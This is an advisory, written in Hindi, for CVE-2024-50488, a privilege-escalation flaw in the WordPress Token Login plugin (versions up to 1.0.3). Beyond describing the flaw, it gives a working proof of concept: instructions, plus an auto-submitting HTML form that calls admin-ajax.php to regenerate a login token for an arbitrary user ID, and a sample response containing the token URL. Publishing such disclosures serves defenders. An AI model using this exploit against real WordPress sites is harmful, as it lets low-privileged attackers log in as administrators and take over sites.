
Token Login <= 1.0.3 - प्रमाणित (Subscriber+) विशेषाधिकार वृद्धि
टोकन लॉगिन <= 1.0.3 - प्रमाणित (Subscriber+) विशेषाधिकार वृद्धि
सुरक्षित टोकनयुक्त URL का उपयोग करके ऑटो लॉगिन। रोल वार लॉगिन प्रतिबंध। वर्डप्रेस के लिए यह प्लगइन 1.0.3 तक के सभी संस्करणों में खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि की भेद्यता से ग्रस्त है। यह इसलिए है क्योंकि प्लगइन ठीक से सत्यापित नहीं करता है कि किसी उपयोगकर्ता के पास अन्य उपयोगकर्ताओं के लिए लॉगिन टोकन उत्पन्न करने की अनुमतियाँ हैं या नहीं। इससे प्रमाणित हमलावरों के लिए, सब्सक्राइबर-स्तरीय पहुंच और उससे ऊपर के, व्यवस्थापकों सहित अन्य के रूप में लॉग इन करना संभव हो जाता है।
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
लॉग इन करें और इस HTML को सबमिट करें। URL को अपने वर्डप्रेस साइट पर बदलें जहाँ आप लॉग इन हैं। उस उपयोगकर्ता का ID बदलें जिसके लिए आप टोकन उत्पन्न करना चाहते हैं। URL कॉपी करें और आप उनके रूप में लॉगिन कर सकते हैं।
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
प्रतिक्रिया
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}